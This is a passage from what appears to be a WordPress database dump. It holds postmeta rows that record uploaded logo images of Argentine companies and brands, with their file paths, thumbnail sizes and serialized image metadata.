der-resized-72x31\";a:5:{s:4:\"file\";s:39:\"federacion-patronal-seguros-2-72x31.png\";s:5:\"width\";i:72;s:6:\"height\";i:31;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1228;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(91,40,'_thumbnail_id','41'),(92,43,'_wp_attached_file','2022/09/Ford-2.png'),(93,43,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:188;s:6:\"height\";i:71;s:4:\"file\";s:18:\"2022/09/Ford-2.png\";s:8:\"filesize\";i:16342;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"Ford-2-150x71.png\";s:5:\"width\";i:150;s:6:\"height\";i:71;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11938;}s:26:\"meta-slider-resized-165x71\";a:5:{s:4:\"file\";s:17:\"Ford-2-165x71.png\";s:5:\"width\";i:165;s:6:\"height\";i:71;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12880;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(94,42,'_edit_last','1'),(95,42,'_thumbnail_id','43'),(96,42,'_edit_lock','1664280147:1'),(97,45,'_wp_attached_file','2022/09/fravega-2.png'),(98,45,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:30;s:4:\"file\";s:21:\"2022/09/fravega-2.png\";s:8:\"filesize\";i:3832;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"fravega-2-150x30.png\";s:5:\"width\";i:150;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2116;}s:25:\"meta-slider-resized-70x30\";a:5:{s:4:\"file\";s:19:\"fravega-2-70x30.png\";s:5:\"width\";i:70;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1069;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(99,44,'_edit_last','1'),(100,44,'_thumbnail_id','45'),(101,44,'_edit_lock','1664280174:1'),(102,47,'_wp_attached_file','2022/09/galeno-seguros-2.png'),(103,47,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:148;s:4:\"file\";s:28:\"2022/09/galeno-seguros-2.png\";s:8:\"filesize\";i:10741;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"galeno-seguros-2-150x148.png\";s:5:\"width\";i:150;s:6:\"height\";i:148;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8744;}s:26:\"meta-slider-resized-200x85\";a:5:{s:4:\"file\";s:27:\"galeno-seguros-2-200x85.png\";s:5:\"width\";i:200;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10390;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(104,46,'_edit_last','1'),(105,46,'_thumbnail_id','47'),(106,46,'_edit_lock','1664280193:1'),(107,49,'_wp_attached_file','2022/09/HFA-2.png'),(108,49,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:178;s:6:\"height\";i:98;s:4:\"file\";s:17:\"2022/09/HFA-2.png\";s:8:\"filesize\";i:6420;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"HFA-2-150x98.png\";s:5:\"width\";i:150;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5309;}s:26:\"meta-slider-resized-178x76\";a:5:{s:4:\"file\";s:16:\"HFA-2-178x76.png\";s:5:\"width\";i:178;s:6:\"height\";i:76;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3496;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(109,48,'_edit_last','1'),(110,48,'_edit_lock','1664280235:1'),(111,48,'_thumbnail_id','49'),(112,51,'_wp_attached_file','2022/09/ICBC_logo-2.png'),(113,51,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:195;s:6:\"height\";i:64;s:4:\"file\";s:23:\"2022/09/ICBC_logo-2.png\";s:8:\"filesize\";i:9478;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"ICBC_logo-2-150x64.png\";s:5:\"width\";i:150;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4603;}s:26:\"meta-slider-resized-149x64\";a:5:{s:4:\"file\";s:22:\"ICBC_logo-2-149x64.png\";s:5:\"width\";i:149;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4576;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(114,50,'_edit_last','1'),(115,50,'_thumbnail_id','51'),(116,50,'_edit_lock','1664280256:1'),(117,53,'_wp_attached_file','2022/09/La-Segunda-Seguros-2.png'),(118,53,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:46;s:4:\"file\";s:32:\"2022/09/La-Segunda-Seguros-2.png\";s:8:\"filesize\";i:10587;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"La-Segunda-Seguros-2-150x46.png\";s:5:\"width\";i:150;s:6:\"height\";i:46;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8265;}s:26:\"meta-slider-resized-107x46\";a:5:{s:4:\"file\";s:31:\"La-Segunda-Seguros-2-107x46.png\";s:5:\"width\";i:107;s:6:\"height\";i:46;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6067;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(119,52,'_edit_last','1'),(120,52,'_edit_lock','1664280276:1'),(121,52,'_thumbnail_id','53'),(122,55,'_wp_attached_file','2022/09/logo-1.png'),(123,55,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:183;s:6:\"height\";i:28;s:4:\"file\";s:18:\"2022/09/logo-1.png\";s:8:\"filesize\";i:2753;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"logo-1-150x28.png\";s:5:\"width\";i:150;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1973;}s:25:\"meta-slider-resized-65x28\";a:5:{s:4:\"file\";s:16:\"logo-1-65x28.png\";s:5:\"width\";i:65;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:790;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(124,54,'_edit_last','1'),(125,54,'_thumbnail_id','55'),(126,54,'_edit_lock','1664280299:1'),(127,57,'_wp_attached_file','2022/09/logo-3.png'),(128,57,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:184;s:6:\"height\";i:20;s:4:\"file\";s:18:\"2022/09/logo-3.png\";s:8:\"filesize\";i:2720;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"logo-3-150x20.png\";s:5:\"width\";i:150;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2397;}s:25:\"meta-slider-resized-46x20\";a:5:{s:4:\"file\";s:16:\"logo-3-46x20.png\";s:5:\"width\";i:46;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:869;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(129,56,'_edit_last','1'),(130,56,'_thumbnail_id','57'),(131,56,'_edit_lock','1664280323:1'),(132,59,'_wp_attached_file','2022/09/logo_horizontal_4-2.png'),(133,59,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:186;s:6:\"height\";i:41;s:4:\"file\";s:31:\"2022/09/logo_horizontal_4-2.png\";s:8:\"filesize\";i:12208;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"logo_horizontal_4-2-150x41.png\";s:5:\"width\";i:150;s:6:\"height\";i:41;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6594;}s:25:\"meta-slider-resized-95x41\";a:5:{s:4:\"file\";s:29:\"logo_horizontal_4-2-95x41.png\";s:5:\"width\";i:95;s:6:\"height\";i:41;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3948;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(134,58,'_edit_last','1'),(135,58,'_thumbnail_id','59'),(136,58,'_edit_lock','1664280616:1'),(137,61,'_wp_attached_file','2022/09/Logo_Oficial_Banco_Comafi-2.png'),(138,61,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:198;s:6:\"height\";i:40;s:4:\"file\";s:39:\"2022/09/Logo_Oficial_Banco_Comafi-2.png\";s:8:\"filesize\";i:7009;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"Logo_Oficial_Banco_Comafi-2-150x40.png\";s:5:\"width\";i:150;s:6:\"height\";i:40;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4420;}s:25:\"meta-slider-resized-93x40\";a:5:{s:4:\"file\";s:37:\"Logo_Oficial_Banco_Comafi-2-93x40.png\";s:5:\"width\";i:93;s:6:\"height\";i:40;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2871;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(139,60,'_edit_last','1'),(140,60,'_thumbnail_id','61'),(141,60,'_edit_lock','1664280637:1'),(142,63,'_wp_attached_file','2022/09/logo-espasa-2.png'),(143,63,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:192;s:6:\"height\";i:52;s:4:\"file\";s:25:\"2022/09/logo-espasa-2.png\";s:8:\"filesize\";i:12306;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"logo-espasa-2-150x52.png\";s:5:\"width\";i:150;s:6:\"height\";i:52;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7745;}s:26:\"meta-slider-resized-121x52\";a:5:{s:4:\"file\";s:24:\"logo-espasa-2-121x52.png\";s:5:\"width\";i:121;s:6:\"height\";i:52;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5209;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144,62,'_edit_last','1'),(145,62,'_thumbnail_id','63'),(146,62,'_edit_lock','1664280656:1'),(147,65,'_wp_attached_file','2022/09/logo-geller-2.png'),(148,65,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:194;s:6:\"height\";i:21;s:4:\"file\";s:25:\"2022/09/logo-geller-2.png\";s:8:\"filesize\";i:3711;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"logo-geller-2-150x21.png\";s:5:\"width\";i:150;s:6:\"height\";i:21;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2329;}s:25:\"meta-slider-resized-49x21\";a:5:{s:4:\"file\";s:23:\"logo-geller-2-49x21.png\";s:5:\"width\";i:49;s:6:\"height\";i:21;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:937;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(149,64,'_edit_last','1'),(150,64,'_thumbnail_id','65'),(151,64,'_edit_lock','1664280675:1'),(152,67,'_wp_attached_file','2022/09/Logo-Recupero-png-2.png'),(153,67,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:70;s:4:\"file\";s:31:\"2022/09/Logo-Recupero-png-2.png\";s:8:\"filesize\";i:14552;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"Logo-Recupero-png-2-150x70.png\";s:5:\"width\";i:150;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9605;}s:26:\"meta-slider-resized-163x70\";a:5:{s:4:\"file\";s:30:\"Logo-Recupero-png-2-163x70.png\";s:5:\"width\";i:163;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10502;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154,66,'_edit_last','1'),(155,66,'_thumbnail_id','67'),(156,66,'_edit_lock','1664280702:1'),(157,69,'_wp_attached_file','2022/09/macro-2.png'),(158,69,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:193;s:6:\"height\";i:43;s:4:\"file\";s:19:\"2022/09/macro-2.png\";s:8:\"filesize\";i:7318;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"macro-2-150x43.png\";s:5:\"width\";i:150;s:6:\"height\";i:43;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4650;}s:26:\"meta-slider-resized-100x43\";a:5:{s:4:\"file\";s:18:\"macro-2-100x43.png\";s:5:\"width\";i:100;s:6:\"height\";i:43;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3093;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(159,68,'_edit_last','1'),(160,68,'_thumbnail_id','69'),(161,68,'_edit_lock','1664280722:1'),(162,71,'_wp_attached_file','2022/09/makro-2.png'),(163,71,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:154;s:6:\"height\";i:60;s:4:\"file\";s:19:\"2022/09/makro-2.png\";s:8:\"filesize\";i:5858;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"makro-2-150x60.png\";s:5:\"width\";i:150;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4397;}s:26:\"meta-slider-resized-140x60\";a:5:{s:4:\"file\";s:18:\"makro-2-140x60.png\";s:5:\"width\";i:140;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4223;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(164,70,'_edit_last','1'),(165,70,'_thumbnail_id','71'),(166,70,'_edit_lock','1664280741:1'),(167,73,'_wp_attached_file','2022/09/medife-2.png'),(168,73,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:52;s:4:\"file\";s:20:\"2022/09/medife-2.png\";s:8:\"filesize\";i:8734;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"medife-2-150x52.png\";s:5:\"width\";i:150;s:6:\"height\";i:52;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6660;}s:26:\"meta-slider-resized-121x52\";a:5:{s:4:\"file\";s:19:\"medife-2-121x52.png\";s:5:\"width\";i:121;s:6:\"height\";i:52;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5319;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(169,72,'_edit_last','1'),(170,72,'_thumbnail_id','73'),(171,72,'_edit_lock','1664280762:1'),(172,75,'_wp_attached_file','2022/09/megatone-2.png'),(173,75,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:197;s:6:\"height\";i:36;s:4:\"file\";s:22:\"2022/09/megatone-2.png\";s:8:\"filesize\";i:6608;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"megatone-2-150x36.png\";s:5:\"width\";i:150;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4124;}s:25:\"meta-slider-resized-84x36\";a:5:{s:4:\"file\";s:20:\"megatone-2-84x36.png\";s:5:\"width\";i:84;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2405;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(174,74,'_edit_last','1'),(175,74,'_thumbnail_id','75'),(176,74,'_edit_lock','1664280779:1'),(177,77,'_wp_attached_file','2022/09/metrogas-2.png'),(178,77,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:187;s:6:\"height\";i:63;s:4:\"file\";s:22:\"2022/09/metrogas-2.png\";s:8:\"filesize\";i:7889;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"metrogas-2-150x63.png\";s:5:\"width\";i:150;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4697;}s:26:\"meta-slider-resized-147x63\";a:5:{s:4:\"file\";s:21:\"metrogas-2-147x63.png\";s:5:\"width\";i:147;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4606;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(179,76,'_edit_last','1'),(180,76,'_thumbnail_id','77'),(181,76,'_edit_lock','1664280799:1'),(182,79,'_wp_attached_file','2022/09/molinos-rio-plata-2.png'),(183,79,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:194;s:6:\"height\";i:108;s:4:\"file\";s:31:\"2022/09/molinos-rio-plata-2.png\";s:8:\"filesize\";i:8616;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"molinos-rio-plata-2-150x108.png\";s:5:\"width\";i:150;s:6:\"height\";i:108;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5031;}s:26:\"meta-slider-resized-194x83\";a:5:{s:4:\"file\";s:30:\"molinos-rio-plata-2-194x83.png\";s:5:\"width\";i:194;s:6:\"height\";i:83;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4160;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(184,78,'_edit_last','1'),(185,78,'_thumbnail_id','79'),(186,78,'_edit_lock','1664280821:1'),(187,81,'_wp_attached_file','2022/09/molinos-victoria-2.png'),(188,81,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:153;s:6:\"height\";i:86;s:4:\"file\";s:30:\"2022/09/molinos-victoria-2.png\";s:8:\"filesize\";i:14559;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"molinos-victoria-2-150x86.png\";s:5:\"width\";i:150;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12056;}s:26:\"meta-slider-resized-153x65\";a:5:{s:4:\"file\";s:29:\"molinos-victoria-2-153x65.png\";s:5:\"width\";i:153;s:6:\"height\";i:65;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8031;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(189,80,'_edit_last','1'),(190,80,'_thumbnail_id','81'),(191,80,'_edit_lock','1664280846:1'),(192,83,'_wp_attached_file','2022/09/Mostaza_2022_logo-2.png'),(193,83,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:152;s:6:\"height\";i:138;s:4:\"file\";s:31:\"2022/09/Mostaza_2022_logo-2.png\";s:8:\"filesize\";i:6428;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"Mostaza_2022_logo-2-150x138.png\";s:5:\"width\";i:150;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6353;}s:26:\"meta-slider-resized-152x65\";a:5:{s:4:\"file\";s:30:\"Mostaza_2022_logo-2-152x65.png\";s:5:\"width\";i:152;s:6:\"height\";i:65;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2274;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(194,82,'_edit_last','1'),(195,82,'_thumbnail_id','83'),(196,82,'_edit_lock','1664280868:1'),(197,85,'_wp_attached_file','2022/09/Musimundo_3.png'),(198,85,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:195;s:6:\"height\";i:37;s:4:\"file\";s:23:\"2022/09/Musimundo_